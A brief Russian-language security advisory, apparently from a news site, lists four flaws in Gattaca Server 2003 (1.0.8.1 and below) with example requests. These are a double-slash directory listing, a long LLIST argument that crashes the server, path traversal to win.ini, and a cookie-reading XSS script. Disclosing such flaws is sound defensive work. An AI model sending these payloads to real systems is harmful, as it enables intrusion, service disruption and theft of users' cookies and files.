Уязвимые версии: Gattaca Server 2003
1.0.8.1 и ниже. Платформа: Windows NT. Уязвимости:

  • при подаче запроса GET с 2 слешами ("//"), сервер раскрывает содержимое каталогов (пример запроса:
    http://[target]//); 
  • если передать команде сервера LLIST параметр в 1048 байт, сервер "падает" ($> LLIST
    AAAA...[1024]...AAAA); 
  • обход директорий:
    http://[target]/view.tmpl?testfile=../../winnt/win.ini
  • межсайтовй скриптинг: http://[target]/view2.tmpl?text= <script>alert("Cookie="+document.cookie)</script>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии